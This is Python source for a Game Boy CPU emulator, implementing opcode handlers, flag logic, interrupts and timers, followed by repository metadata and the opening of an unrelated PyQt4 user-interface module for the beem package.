Initializes the cpu for running the bootstrap "bios".
"""
self.pc = 0
self.sp = 0
def execute_boot_opcode(self, num=1):
"""
Executes an opcode of the booting sequence, takes
????? instructions to complete.
Reads instructions with mem.read_bios() instead
of from normal memory.
Returns
-------
int
number of clock cycles taken
"""
if self.pc >= 0x100:
log.info("BIOS COMPLETE!")
self.dump_registers()
quit()
opcode = self.mem.read_bios(self.pc)
self.pc += 1
try:
#log.info("executing: " + hex(opcode) + " @ " + hex(self.pc - 1))
cycles = self.opcodes[opcode]()
except KeyError:
log.critical('INVALID OPCODE ' + hex(opcode) + ' @ ' + hex(self.pc))
cycles = 0
return cycles
def execute_opcode(self, num=1):
"""
Executes num number of opcode instructions.
...
Parameters
----------
num : int
number of opcode instructions to execute
Returns
-------
int
number of clock cycles taken to execute
"""
opcode = self.mem.read(self.pc)
self.pc += 1
try:
cycles = self.opcodes[opcode]()
except KeyError:
log.critical('INVALID OPCODE ' + hex(opcode) + ' @ ' + hex(self.pc))
quit()
cycles += self.check_interrupts()
self.update_timers(cycles)
return cycles
def extended_opcode(self):
"""
Extended opcodes.
Returns
-------
int
number of cycles taken
"""
opcode = self.mem.read(self.pc)
self.pc += 1
try:
cycles = self.ext_opcodes[opcode]()
except KeyError:
log.critical('EXTENDED INVALID OPCODE ' + hex(opcode) + ' @ ' + hex(self.pc))
quit()
            cycles = 0
return cycles
def check_interrupts(self):
"""
Checks to see if any interrupts need to be serviced
"""
if not self.interrupt_enable:
return 0
ie = self.mem.read(0xffff)
ir = self.mem.read(0xff0f)
for bit in range(5):
if self.is_set(ie, bit) and self.is_set(ir, bit):
self.push_pc()
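                # jump to the handler vector: 0x40 (VBlank), 0x48 (LCD STAT),
                # 0x50 (Timer), 0x58 (Serial), 0x60 (Joypad) for bits 0-4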
self.pc = 0x40 + (bit << 3)
ir &= ~(1 << bit)
self.mem.write(ir & 0xff, 0xff0f)
self.interrupt_enable = False
return 20
return 0
def update_timers(self, cycles):
"""
Updates the timers, requests interrupts if needed.
"""
self.div_clock += cycles
if self.div_clock >= 256:
self.div_clock = self.div_clock % 256
self.mem.inc_div()
tima_ctrl = self.mem.read(0xff07)
if tima_ctrl & 0x4 == 0:
self.tima_clock = 0
else:
self.tima_clock += cycles
rate = self.get_tima_rate(tima_ctrl)
if self.tima_clock >= rate:
self.tima_clock = self.tima_clock % rate
self.mem.inc_tima()
def get_tima_rate(self, ctrl):
"""
Gets the increment rate from tima ctrl.
"""
speed = ctrl & 0x3
if speed == 0:
return 1024
elif speed == 1:
return 16
elif speed == 2:
return 64
else:
return 256
def request_interrupt(self, num):
"""
Request an interrupt to be serviced by cpu
num == 0 - VBlank
1 - LCD STAT
2 - Timer
3 - Serial
4 - Joypad
"""
ir = self.mem.read(0xff0f)
ir |= 1 << num
self.mem.write(ir, 0xff0f)
def NOP(self):
""" No operation """
return 4
def ld_byte_n(self, reg_index):
"""
Load a byte from memory into register.
Byte is located at pc.
...
Parameters
----------
reg_index : int
index of reg to load
"""
self.reg[reg_index] = self.mem.read(self.pc)
self.pc += 1
return 8
def ld_r1_r2(self, r1, r2):
"""
Put value r2 into r1.
r1,r2 = A,B,C,D,E,H,L,(HL)
...
Parameters
----------
r1 : int
index of r1
r2 : int
index of r2
"""
if r2 != self.HL and r1 != self.HL:
self.reg[r1] = self.reg[r2]
return 4
elif r2 == self.HL:
self.reg[r1] = self.mem.read(self.get_reg(self.H, self.L))
return 8
elif r2 == self.N:
self.mem.write(self.mem.read(self.pc), self.get_reg(self.H, self.L))
self.pc += 1
return 12
else:
self.mem.write(self.reg[r2], self.get_reg(self.H, self.L))
return 8
def load_a(self, src):
"""
Put value src into A.
src = (BC/DE/nn), n
...
Parameters
----------
src
which src to load into a
"""
if src == self.BC:
self.reg[self.A] = self.mem.read(self.get_reg(self.B, self.C))
return 8
elif src == self.DE:
self.reg[self.A] = self.mem.read(self.get_reg(self.D, self.E))
return 8
elif src == self.NN:
self.reg[self.A] = self.mem.read(self.mem.read_word(self.pc))
self.pc += 2
return 16
else: #self.N
self.reg[self.A] = self.mem.read(self.pc)
self.pc += 1
return 8
def write_a(self, dest):
"""
Put value A into dest.
...
Parameters
----------
dest : A-L, (BC/DE/HL/nn)
place to store A
"""
if dest == self.BC:
self.mem.write(self.reg[self.A], self.get_reg(self.B, self.C))
return 8
elif dest == self.DE:
self.mem.write(self.reg[self.A], self.get_reg(self.D, self.E))
return 8
elif dest == self.HL:
self.mem.write(self.reg[self.A], self.get_reg(self.H, self.L))
return 8
elif dest == self.NN:
self.mem.write(self.reg[self.A], self.mem.read_word(self.pc))
self.pc += 2
return 16
else:
self.reg[dest] = self.reg[self.A]
return 4
def load_a_c(self, store=False):
"""
Load A, (C) - put value at 0xff00 + regC into A, or
Put A into address 0xff00 + regC
...
Parameters
----------
store : bool
False - Put value 0xff00 + regC into A
True - store A at 0xff00 + regC
Returns
-------
int
num of cycles
"""
if store:
self.mem.write(self.reg[self.A], self.reg[self.C] + 0xff00)
else:
self.reg[self.A] = self.mem.read(self.reg[self.C] + 0xff00)
return 8
def load_a_hl(self, dec, load):
"""
Store/load A in (HL), or (HL) in A, increment/decrement HL.
...
Parameters
----------
dec : bool
Decrement register HL if True, increments if False
load : bool
Load value at (HL) into A if true
Store A at (HL) if false
Returns
-------
int
num of cycles
"""
if load:
self.reg[self.A] = self.mem.read(self.get_reg(self.H, self.L))
else:
self.mem.write(self.reg[self.A], self.get_reg(self.H, self.L))
HL_val = self.get_reg(self.H, self.L)
HL_val += -1 if dec else 1
self.set_reg(self.H, self.L, HL_val)
return 8
def a_n(self, store):
"""
Store/load A in memory address 0xff00 + n
Parameters
----------
store : bool
if true writes, if false loads
Returns
-------
int
num of cycles
"""
offset = self.mem.read(self.pc)
self.pc += 1
if store:
self.mem.write(self.reg[self.A], offset + 0xff00)
else:
#print('address: ' + hex(offset+ 0xff00) + ' ' + hex(self.mem.read(offset + 0xff00)))
self.reg[self.A] = self.mem.read(offset + 0xff00)
return 12
def ld_nn(self, dest, set_sp=False):
"""
Put value nn into dest.
Dest = BC/DE/HL/SP
Parameters
----------
dest : int
destination register pair (defined in class constants)
if not self.BC/DE/HL defaults to setting stack pointer
set_sp : bool
if True, loads value into stack pointer
if False, doesn't
Returns
-------
int
num of cycles
"""
word = self.mem.read_word(self.pc)
self.pc += 2
if set_sp:
self.sp = word
return 12
elif dest == self.BC:
r1 = self.B
r2 = self.C
elif dest == self.DE:
r1 = self.D
r2 = self.E
elif dest == self.HL:
r1 = self.H
r2 = self.L
self.set_reg(r1, r2, word)
return 12
def ld_sp_hl(self):
"""
Put HL into sp.
Returns
-------
int
number of cycles
"""
self.sp = self.get_reg(self.H, self.L)
return 8
def ldhl_sp(self):
"""
Put sp + n effective address into HL.
n = one byte signed value
Flags:
Z/N - Reset
H/C - Set/Reset according to operation
"""
#interpret as signed byte
n = c_int8(self.mem.read(self.pc)).value
self.pc += 1
self.set_reg(self.H, self.L, self.sp + n)
self.reset_flags()
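# H and C come from the low-byte (8-bit) addition of SP and n, matching hardware behavior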
if (self.sp & 0xf) + (n & 0xf) > 0xf:
self.set_flag(self.flags.H)
if (self.sp & 0xff) + (n & 0xff) > 0xff:
self.set_flag(self.flags.C)
return 12
def ld_nn_sp(self):
"""
Put sp at address nn (two byte immediate address).
Returns
-------
int
number of clock cycles
"""
address = self.mem.read_word(self.pc)
self.pc += 2
self.mem.write(self.sp & 0xff, address)
self.mem.write((self.sp & 0xff00) >> 8, address + 1)
return 20
def push_nn(self, r1, r2):
"""
Push register pair r1r2 onto stack.
Decrement sp twice.
Parameters
----------
r1, r2
register pair r1r2
"""
self.sp -= 1
self.mem.write(self.reg[r1], self.sp)
self.sp -= 1
self.mem.write(self.reg[r2], self.sp)
return 16
def pop_nn(self, r1, r2):
"""
Pop two bytes off stack into register pair r1r2.
Increment sp twice.
Parameters
----------
r1
reg1
r2
reg2
"""
self.reg[r2] = self.mem.read(self.sp)
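# the low nibble of F always reads as zero on hardware, so mask it when popping into F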
if r2 == self.F:
self.reg[r2] &= 0xf0
self.sp += 1
self.reg[r1] = self.mem.read(self.sp)
self.sp += 1
return 12
def set_reg(self, r1, r2, word):
"""
set register pair r1r2 to 16 bit word.
Parameters
----------
r1,r2 : ints
indexes of r1 r2 registers to set
r1 = H, r2 = L sets pair HL
"""
self.reg[r1] = (word & 0xff00) >> 8
self.reg[r2] = word & 0xff
def get_reg(self, r1, r2):
"""
Access register pair r1r2 - the combination of the r1 and r2 registers.
For example get_reg(H,L) accesses register HL
...
Returns
-------
int
value of the r1r2 register pair
"""
return ((self.reg[r1] << 8) | self.reg[r2])
def set_flag(self, flag):
"""
Sets Flag flag in the F register.
Parameters
----------
flag : Flag enum
which flag to set
"""
if flag == self.flags.Z:
self.reg[self.F] |= 0x80
elif flag == self.flags.H:
self.reg[self.F] |= 0x20
elif flag == self.flags.C:
self.reg[self.F] |= 0x10
elif flag == self.flags.N:
self.reg[self.F] |= 0x40
def reset_flag(self, flag):
"""
Resets Flag flag in the F register.
Parameters
----------
flag : Flag enum
which flag to reset
"""
if flag == self.flags.Z:
self.reg[self.F] &= 0x70
elif flag == self.flags.H:
self.reg[self.F] &= 0xd0
elif flag == self.flags.C:
self.reg[self.F] &= 0xe0
elif flag == self.flags.N:
self.reg[self.F] &= 0xb0
def flag_set(self, flag):
"""
Returns True if flag is set
False if not
Parameters
----------
flag : Flag enum
which flag to check
Returns
-------
bool
True if set, False if not
"""
if flag == self.flags.Z:
return self.reg[self.F] & 0x80 != 0
elif flag == self.flags.H:
return self.reg[self.F] & 0x20 != 0
elif flag == self.flags.C:
return self.reg[self.F] & 0x10 != 0
elif flag == self.flags.N:
return self.reg[self.F] & 0x40 != 0
def add_a_n(self, src, add_carry=False):
"""
Add n to A (and carry if add_carry is true).
Flags:
Z - Set if zero
N - Reset
H - Set if carry from bit 3
C - Set if carry from bit 7
Parameters
----------
src
source A-L, (HL), or n
Returns
-------
int
clock cycles taken
"""
a_reg = self.reg[self.A]
if src == self.N:
val = self.mem.read(self.pc)
self.pc += 1
elif src == self.HL:
val = self.mem.read(self.get_reg(self.H, self.L))
else: #src is index of A-L
val = self.reg[src]
carry_bit = 1 if add_carry and self.flag_set(self.flags.C) else 0
self.reg[self.A] = (a_reg + carry_bit + val) & 0xff
self.reset_flags()
if self.reg[self.A] == 0:
self.set_flag(self.flags.Z)
if (a_reg & 0xf) + (val & 0xf) + carry_bit > 0xf:
self.set_flag(self.flags.H)
if a_reg + val + carry_bit > 0xff:
self.set_flag(self.flags.C)
return 8 if src == self.N or src == self.HL else 4
def sub_a_n(self, src, sub_carry=False):
"""
Subtract n from A (n + carry if sub_carry is true)
Flags:
Z - Set if 0
N - Set
H - Set if borrow from bit 4
C - Set if borrow (A less than n + carry)
Parameters
----------
src
source A-L, (HL), or n
Returns
-------
int
number of cycles elapsed
"""
a_reg = self.reg[self.A]
if src == self.N:
val = self.mem.read(self.pc)
self.pc += 1
elif src == self.HL:
val = self.mem.read(self.get_reg(self.H, self.L))
else: #src is index of A-L
val = self.reg[src]
carry_bit = 1 if sub_carry and self.flag_set(self.flags.C) else 0
self.reg[self.A] = (a_reg - val - carry_bit) & 0xff
self.reset_flags()
if self.reg[self.A] == 0:
self.set_flag(self.flags.Z)
if (a_reg & 0xf) < (val & 0xf) + carry_bit:
self.set_flag(self.flags.H)
if a_reg < val + carry_bit:
self.set_flag(self.flags.C)
self.set_flag(self.flags.N)
return 8 if src == self.N or src == self.HL else 4
def and_n(self, src):
"""
Logically AND n with A, result in A
Flags:
Z - Set if result is 0
N/C - Reset
H - Set
Parameters
----------
src
source A-L, (HL), or n
Returns
-------
int
number of cycles elapsed
"""
a_reg = self.reg[self.A]
if src == self.N:
val = self.mem.read(self.pc)
self.pc += 1
elif src == self.HL:
val = self.mem.read(self.get_reg(self.H, self.L))
else: #src is index of A-L
val = self.reg[src]
self.reg[self.A] = val & a_reg & 0xff
self.reset_flags()
if self.reg[self.A] == 0:
self.set_flag(self.flags.Z)
self.set_flag(self.flags.H)
return 8 if src == self.N or src == self.HL else 4
def or_n(self, src, exclusive_or=False):
"""
Logically OR or XOR n with A, result in A.
Flags:
Z - Set if 0
N/H/C - Reset
Parameters
----------
src
source A-L, (HL), or n
exclusive_or
if True uses exclusive OR not OR
Returns
-------
int
number of cycles elapsed
"""
a_reg = self.reg[self.A]
if src == self.N:
val = self.mem.read(self.pc)
self.pc += 1
elif src == self.HL:
val = self.mem.read(self.get_reg(self.H, self.L))
else: # src is index of A-L
val = self.reg[src]
#
# if exclusive_or:
# print("data: " + hex(val))
# print("reg a: " + hex(a_reg))
# print((a_reg ^ val) & 0xff)
self.reg[self.A] = (a_reg ^ val) if exclusive_or else (a_reg | val)
self.reg[self.A] &= 0xff
self.reset_flags()
if self.reg[self.A] == 0:
self.set_flag(self.flags.Z)
return 8 if src == self.HL or src == self.N else 4
def cp_n(self, src):
"""
Compare A with n (A - n subtraction, but the result is not saved).
Flags:
Z - Set if 0
N - Set
H - Set if borrow from bit 4
C - Set if borrow (if A is less than n)
Parameters
----------
src
A-L, (HL), N
Returns
-------
int
number of clock cycles
"""
a_reg = self.reg[self.A]
if src == self.N:
val = self.mem.read(self.pc)
self.pc += 1
elif src == self.HL:
val = self.mem.read(self.get_reg(self.H, self.L))
else: # src is index
val = self.reg[src]
self.reset_flags()
self.set_flag(self.flags.N)
if val == a_reg:
self.set_flag(self.flags.Z)
if (a_reg & 0xf) < (val & 0xf):
self.set_flag(self.flags.H)
if a_reg < val:
self.set_flag(self.flags.C)
return 8 if src == self.N or src == self.HL else 4
def inc_n(self, src):
"""
Increment register n
Flags:
Z - Set if 0
N - Reset
H - Set if carry from bit 3
C - Not affected
Parameters
----------
src
A-L, (HL)
Returns
-------
int
number of cycles
"""
if src == self.HL:
val = self.mem.read(self.get_reg(self.H, self.L))
#log.debug('INC HL: address:' + hex(self.get_reg(self.H, self.L)))
#log.debug('OLD VAL: ' + hex(val))
old_val = val
self.mem.write((val + 1) & 0xff, self.get_reg(self.H, self.L))
val = (val + 1) & 0xff
#log.debug('NEW VAL: ' + hex((val + 1) & 0xff))
else: # src is index
old_val = self.reg[src]
val = (self.reg[src] + 1) & 0xff
self.reg[src] = val
self.reset_flag(self.flags.Z)
if val == 0:
self.set_flag(self.flags.Z)
self.reset_flag(self.flags.N)
self.reset_flag(self.flags.H)
if old_val & 0xf == 0xf:
self.set_flag(self.flags.H)
return 12 if src == self.HL else 4
def dec_n(self, src):
"""
Decrement register n.
Flags:
Z - Set if 0
N - Set
H - Set if borrow from bit 4
C - Not affected
Parameters
----------
src
A-L, (HL)
Returns
-------
int
number of cycles
"""
if src == self.HL:
val = self.mem.read(self.get_reg(self.H, self.L))
self.mem.write((val - 1) & 0xff, self.get_reg(self.H, self.L))
val = (val - 1) & 0xff
else: # src is index
val = (self.reg[src] - 1) & 0xff
self.reg[src] = val
self.set_flag(self.flags.Z) if val == 0 \
else self.reset_flag(self.flags.Z)
self.set_flag(self.flags.N)
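# H (half-borrow) is set when the decrement borrows from bit 4, i.e. the high nibble changed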
self.set_flag(self.flags.H) if (val + 1) & 0xf0 != 0xf0 & val \
else self.reset_flag(self.flags.H)
return 12 if src == self.HL else 4
def add_hl(self, r1, r2, add_sp=False):
"""
Add n to HL.
Flags:
Z - Not affected
N - Reset
H - Set if carry from bit 11
C - Set if carry from bit 15
Parameters
----------
r1, r2
register index for HL, BC, DE
add_sp : bool
if true addes to sp not register pair
Returns
-------
int
cycles taken
"""
hl = self.get_reg(self.H, self.L)
val = self.sp if add_sp else self.get_reg(r1, r2)
self.set_reg(self.H, self.L, (val + hl) & 0xffff)
self.reset_flag(self.flags.N)
if (val & 0xfff) + (hl & 0xfff) > 0xfff:
self.set_flag(self.flags.H)
else:
self.reset_flag(self.flags.H)
if val + hl > 0xffff:
self.set_flag(self.flags.C)
else:
self.reset_flag(self.flags.C)
return 8
def add_sp_n(self):
"""
Adds an immediate signed byte to sp.
Flags:
Z, N - Reset
H, C - Set/Reset according to operation
NOTE: documentation is vague on whether H/C use 8 bit or
16 bit addition behavior; this implementation uses the low byte (8 bit)
Returns
-------
int
cycles taken
"""
# read as a signed byte
val = c_int8(self.mem.read(self.pc)).value
self.pc += 1
self.reset_flags()
if (self.sp & 0xf) + (val & 0xf) > 0xf:
self.set_flag(self.flags.H)
if (self.sp & 0xff) + (val & 0xff) > 0xff:
self.set_flag(self.flags.C)
self.sp += val
self.sp &= 0xffff
return 16
def inc_nn(self, r1, r2, inc_sp=False):
"""
Increment register pair r1r2.
Parameters
----------
r1r2
register pair r1r2
inc_sp : Boolean
if True increments SP not r1r2
Returns
-------
int
clock cycles taken
"""
if inc_sp:
self.sp += 1
self.sp &= 0xffff
else:
val = self.get_reg(r1, r2)
self.set_reg(r1, r2, (val + 1) & 0xffff)
return 8
def dec_nn(self, r1, r2, dec_sp=False):
"""
Decrement register pair r1r2
Parameters
----------
r1r2
register pair r1r2
dec_sp : boolean
if True decrements SP not r1r2
Returns
-------
int
clock cycles taken
"""
if dec_sp:
self.sp -= 1
self.sp &= 0xffff
else:
val = self.get_reg(r1, r2)
self.set_reg(r1, r2, (val - 1) & 0xffff)
return 8
def jump_nn(self):
"""
Jump to nn.
"""
val = self.mem.read_word(self.pc)
self.pc = val
return 12
def jump_cc(self, isSet, flag, immmediate_jump=False):
"""
Jump if the state of flag matches isSet.
Parameters
----------
isSet : bool
jump only if flag_set(flag) == isSet
flag : Flag enum
which flag to test
immmediate_jump : bool
if True, jump relative by a signed byte (jump_n);
if False, jump to a two byte absolute address (jump_nn)
Returns
-------
int
number of cycles
"""
if self.flag_set(flag) == isSet:
return self.jump_n() if immmediate_jump else self.jump_nn()
if not immmediate_jump:
self.pc += 1 #two byte jump address so skip it
self.pc += 1
return 12
def jump_hl(self):
"""
Jump to address in HL
Returns
-------
int
cycles taken
"""
self.pc = self.get_reg(self.H, self.L)
return 4
def jump_n(self):
"""
Add n to current address and jump to it.
Returns
-------
int
cycles taken
"""
val = c_int8(self.mem.read(self.pc)).value
self.pc += 1
self.pc += val
return 8
def dec_adjust(self):
"""
Decimal adjust reg A to a representation of Binary Coded Decimal.
Flags
Z - Set if A is zero
N - Not affected
H - Reset
C - Set or reset
referenced GB programming manual page 110 and
github.com/gekkio/mooneye-gb
Returns
-------
int
clock cycles taken
"""
carry = False
a_reg = self.reg[self.A]
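# the N flag tells whether the last arithmetic op was a subtraction; the BCD correction differs for add vs sub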
if not self.flag_set(self.flags.N):
if self.flag_set(self.flags.C) or a_reg > 0x99:
a_reg += 0x60
carry = True
a_reg &= 0xff
if self.flag_set(self.flags.H) or a_reg & 0x0f > 0x09:
a_reg += 0x06
a_reg &= 0xff
elif self.flag_set(self.flags.C):
carry = True
a_reg += 0x9a if self.flag_set(self.flags.H) else 0xa0
a_reg &= 0xff
elif self.flag_set(self.flags.H):
a_reg += 0xfa
a_reg &= 0xff
self.reset_flag(self.flags.H)
self.reset_flag(self.flags.Z)
if a_reg == 0:
self.set_flag(self.flags.Z)
self.reset_flag(self.flags.C)
if carry:
self.set_flag(self.flags.C)
self.reg[self.A] = a_reg
return 4
def complement_a(self):
"""
Complements register A (toggles all bits).
Flags
N/H - Set
C/Z - Not affected
Returns
-------
int
number of cycles taken
"""
self.reg[self.A] ^= 0xff
self.set_flag(self.flags.N)
self.set_flag(self.flags.H)
return 4
def complement_cf(self):
"""
Complements the carry flag (toggles it).
Flags
Z - Not affected
H/N - Reset
C - Toggles
Returns
-------
int
cycles taken
"""
if self.flag_set(self.flags.C):
self.reset_flag(self.flags.C)
else:
self.set_flag(self.flags.C)
self.reset_flag(self.flags.N)
self.reset_flag(self.flags.H)
return 4
def set_cf(self):
"""
Sets the carry flag.
Flags
Z - Not affected
H/N - Reset
C - Set
Returns
-------
int
cycles taken
"""
self.set_flag(self.flags.C)
self.reset_flag(self.flags.H)
self.reset_flag(self.flags.N)
return 4
def rotate_l_a_c(self):
"""
Rotates A left, old bit 7 to carry flag.
Flags
Z - Reset (always cleared on the Game Boy)
N/H - Reset
C - Contains old bit 7 data
Returns
-------
int
cycles taken
"""
a_reg = self.reg[self.A]
msb = (a_reg & 0x80) >> 7
a_reg <<= 1
a_reg |= msb
self.reset_flags()
if msb == 1:
self.set_flag(self.flags.C)
self.reg[self.A] = a_reg & 0xff
return 4
def rotate_n_lc(self, src):
"""
Rotates n left, old bit 7 to carry flag.
Flags
Z - Set if 0
N/H - Reset
C - Old bit 7 data
...
Parameters
-----------
src
A-L, HL
Returns
-------
int
cycles taken
"""
if src == self.HL:
data = self.mem.read(self.get_reg(self.H, self.L))
else:
data = self.reg[src]
msb = (data & 0x80) >> 7
data <<= 1
data |= msb
self.reset_flags()
if msb == 1:
self.set_flag(self.flags.C)
if data == 0:
self.set_flag(self.flags.Z)
if src == self.HL:
self.mem.write(data & 0xff, self.get_reg(self.H, self.L))
return 16
else:
self.reg[src] = data & 0xff
return 8
def rotate_l_n(self, src):
"""
Rotates n left through carry flag.
src - A-HL
Flags
Z - set if 0
N/H - reset
C - old bit 7 data
...
Returns
int
cycles taken
"""
if src == self.HL:
data = self.mem.read(self.get_reg(self.H, self.L))
else:
data = self.reg[src]
msb = ((data & 0x80) >> 7) & 1
carry_in = 1 if self.flag_set(self.flags.C) else 0
data = (data << 1 | carry_in) & 0xff
self.reset_flags()
if msb == 1:
self.set_flag(self.flags.C)
if data == 0:
self.set_flag(self.flags.Z)
if src == self.HL:
self.mem.write(data, self.get_reg(self.H, self.L))
return 16
else:
self.reg[src] = data & 0xff
return 8
def rotate_l_a(self):
"""
Rotate A left through carry flag.
Flags
Z/N/H - Reset
C - Old bit 7 data
Returns
-------
int
cycles taken
"""
a_reg = self.reg[self.A]
a_reg <<= 1
if self.flag_set(self.flags.C):
a_reg |= 1 # set lsb to C
self.reset_flags()
if a_reg & 0x100 == 0x100:
self.set_flag(self.flags.C)
self.reg[self.A] = a_reg & 0xff
return 4
def rotate_r_a_c(self):
"""
Rotates A right, old bit 0 to carry flag.
Flags:
C - Old bit 0
Z/H/N - Reset
Returns
-------
int
clock cycles taken
"""
a_reg = self.reg[self.A]
lsb = a_reg & 0x1
a_reg >>= 1
a_reg |= lsb << 7
self.reset_flags()
if lsb == 1:
self.set_flag(self.flags.C)
self.reg[self.A] = a_reg & 0xff
return 4
# Z is always reset by this rotate on the Game Boy; reset_flags() already handles that
def rotate_r_a(self):
"""
Rotate A right through carry flag.
Flags
C - Old bit 0
Z/H/N - Reset
Returns
-------
int
cycles taken
"""
a_reg = self.reg[self.A]
lsb = a_reg & 0x1
a_reg >>= 1
if self.flag_set(self.flags.C):
a_reg |= 0x80
self.reset_flags()
if lsb == 1:
self.set_flag(self.flags.C)
self.reg[self.A] = a_reg & 0xff
return 4
def rr_n(self, src):
"""
Rotate n right through Carry Flag
n = A-L, (HL)
Flags
Z - set if 0
N/H - Reset
C - Old bit 0
Returns
-------
int
cycles taken
"""
if src == self.HL:
data = self.mem.read(self.get_reg(self.H, self.L))
else:
data = self.reg[src]
lsb = data & 0x1
carryIn = 1 if self.flag_set(self.flags.C) else 0
data = (data >> 1) | (carryIn << 7)
data &= 0xff
self.reset_flags()
if data == 0:
self.set_flag(self.flags.Z)
if lsb != 0:
self.set_flag(self.flags.C)
if src == self.HL:
self.mem.write(data, self.get_reg(self.H, self.L))
else:
self.reg[src] = data
return 16 if src == self.HL else 8
def rrc_n(self, src):
"""
Rotate n right. Old bit 0 to carry flag
Flags
Z - Set if 0
N/H - Reset
C - Old bit 0 data
Returns
int
cycles taken
"""
if src == self.HL:
data = self.mem.read(self.get_reg(self.H, self.L))
else:
data = self.reg[src]
lsb = data & 0x1
data = (data >> 1) | (lsb << 7)
data &= 0xff
self.reset_flags()
if data == 0:
self.set_flag(self.flags.Z)
if lsb == 1:
self.set_flag(self.flags.C)
if src == self.HL:
self.mem.write(data, self.get_reg(self.H, self.L))
else:
self.reg[src] = data
return 8 if src != self.HL else 16
#TODO
def stop(self):
self.pc += 1
log.critical("IMPLEMENT STOP")
return 0
#TODO
def disable_interrupts(self):
self.interrupt_enable = False
return 4
#TODO
def enable_interrupts(self):
self.interrupt_enable = True
return 4
def call(self):
"""
Push address of next instruction onto stack and then jump to address
nn.
Returns
-------
int
cycles taken
"""
address = self.mem.read_word(self.pc)
self.pc += 2
self.push_pc()
self.pc = address
return 12
def call_cc(self, flag, isSet):
"""
Call address n if isSet and flag match
Returns
-------
int
cycles taken
"""
if self.flag_set(flag) == isSet:
return 12 + self.call()
else:
self.pc += 2
return 12
def ret(self):
"""
Pops two bytes from stack jumps to that address
Returns
-------
int
cycles taken
"""
self.pc = self.mem.read_word(self.sp)
self.sp += 2
return 8
def ret_cc(self, flag, isSet):
"""
Return if isSet and flag match
Returns
-------
int
cycles taken
"""
if self.flag_set(flag) == isSet:
return 12 + self.ret()
else:
return 8
def push_pc(self):
"""
Pushes current program counter value to the stack
MSB first
"""
self.sp -= 1
self.mem.write((self.pc & 0xff00) >> 8, self.sp)
self.sp -= 1
self.mem.write((self.pc & 0xff), self.sp)
def dump_registers(self):
"""
Prints the current cpu registers and their values to the screen.
"""
print("A: ", hex(self.reg[self.A]))
print("B: ", hex(self.reg[self.B]))
print("C: ", hex(self.reg[self.C]))
print("D: ", hex(self.reg[self.D]))
print("E: ", hex(self.reg[self.E]))
print("F: ", hex(self.reg[self.F]))
print("H: ", hex(self.reg[self.H]))
print("L: ", hex(self.reg[self.L]))
print("PC: ", hex(self.pc))
print("SP: ", hex(self.sp))
def reset_flags(self):
""" Resets all Flags to 0. """
self.reg[self.F] = 0
def sla_n(self, src):
"""
Shift src left into carry, LSB of n set to 0.
Flags
Z - Set if 0
H/N - Reset
C - old bit 7 data
Parameters
----------
src
A-L, (HL)
Returns
-------
int
cycles taken
"""
if src == self.HL:
data = self.mem.read(self.get_reg(self.H, self.L))
else:
data = self.reg[src]
msb = (data & 0x80) & 0xff
data <<= 1
data &= 0xff
self.reset_flags()
if data == 0:
self.set_flag(self.flags.Z)
if msb != 0:
self.set_flag(self.flags.C)
if src == self.HL:
self.mem.write(data, self.get_reg(self.H, self.L))
else:
self.reg[src] = data
return 8 if src != self.HL else 16
def srl_n(self, src, signed):
"""
Shift n right into Carry. MSB is preserved if signed = True (arithmetic shift), else set to 0 (logical shift)
n : A-L, (HL)
Flags:
Z - set if 0
N/H - Reset
C - Old bit 0 data
Parameters
----------
src
register to shift
signed
if True the MSB is preserved, if False it is set to 0
Returns
-------
int
cycles taken
"""
if src == self.HL:
data = self.mem.read(self.get_reg(self.H, self.L))
else:
data = self.reg[src]
lsb = data & 0x1
if signed:
bit7 = data & 0x80
data >>= 1
data |= bit7
else:
data >>= 1
data &= 0x7f
self.reset_flags()
if data == 0:
self.set_flag(self.flags.Z)
if lsb == 1:
self.set_flag(self.flags.C)
if src == self.HL:
self.mem.write(data, self.get_reg(self.H, self.L))
else:
self.reg[src] = data
return 16 if src == self.HL else 8
def swap(self, src):
"""
Swaps the upper and lower nibbles of n.
n = A-L/(HL)
Flags
Z - Set if 0
N/H/C - Reset
Parameters
----------
src
to swap A-L/(HL)
Returns
-------
int
clock cycles
"""
if src == self.HL:
data = self.mem.read(self.get_reg(self.H, self.L))
else:
data = self.reg[src]
lower_nibble = data & 0xf
data = ((data & 0xf0) >> 4) | (lower_nibble << 4)
self.reset_flags()
if data == 0x0:
self.set_flag(self.flags.Z)
if src == self.HL:
self.mem.write(data, self.get_reg(self.H, self.L))
else:
self.reg[src] = data
return 16 if src == self.HL else 8
def bit_br(self, bit, reg):
"""
Tests bit b in register r.
Flags:
Z - Set if 0
N - reset
H - set
C - not affected
Returns
-------
int
number of cycles
"""
if reg == self.HL:
data = self.mem.read(self.get_reg(self.H, self.L))
else:
data = self.reg[reg]
self.reset_flag(self.flags.Z)
if not self.is_set(data, bit):
self.set_flag(self.flags.Z)
self.reset_flag(self.flags.N)
self.set_flag(self.flags.H)
return 8 if reg == self.HL else 4
def set_b_r(self, src, bit, new_bit):
"""
Sets bit bit in src to new_bit.
"""
if src == self.HL:
data = self.mem.read(self.get_reg(self.H, self.L))
else:
data = self.reg[src]
data = self.set_bit(data, bit, new_bit)
if src == self.HL:
self.mem.write(data, self.get_reg(self.H, self.L))
return 8
else:
self.reg[src] = data
return 4
def set_bit(self, num, bit, new_bit):
"""
Sets bit bit in num to new_bit.
"""
if new_bit == 1:
return num | 1 << bit
else:
return num & ~(1 << bit)
def is_set(self, num, bit):
"""
Tests if bit bit is set in num.
Returns
-------
True if 1
False if 0
"""
return ((num >> bit) & 0x1) == 0x1
def restart(self, offset):
"""
Pushes current address onto the stack, and then jumps to
0x0 + offset.
"""
self.push_pc()
self.pc = offset
return 16
#TODO
def ret_interrupts(self):
"""
Returns and enables interrupts
"""
self.interrupt_enable = True
return self.ret()
def halt(self):
"""
TODO
"""
return 4
|
mit
| -9,042,496,380,038,771,000
| 29.895788
| 98
| 0.479938
| false
| 3.15157
| false
| false
| false
|
gpoulin/pybeem
|
beem/ui/ui.py
|
1
|
2119
|
import os
import json
import sip
sip.setapi('QString', 2)
sip.setapi('QVariant', 2)
sip.setapi('QDate', 2)
sip.setapi('QDateTime', 2)
sip.setapi('QTextStream', 2)
sip.setapi('QTime', 2)
sip.setapi('QUrl', 2)
from PyQt4 import QtGui, QtCore
signal = QtCore.pyqtSignal
slot = QtCore.pyqtSlot
property = QtCore.pyqtProperty
from beem.io import grid_from_3ds
from beem.experiment import Grid
from beem.ui.graph import contourplot
_pref = dict()
def select_file(folder = None, filter = None):
filename = QtGui.QFileDialog.getOpenFileNames(directory = folder,
filter = filter)
return filename
def open3ds(filename = None, folder = None):
"""Return a Grid object from 3ds files
"""
if filename is None:
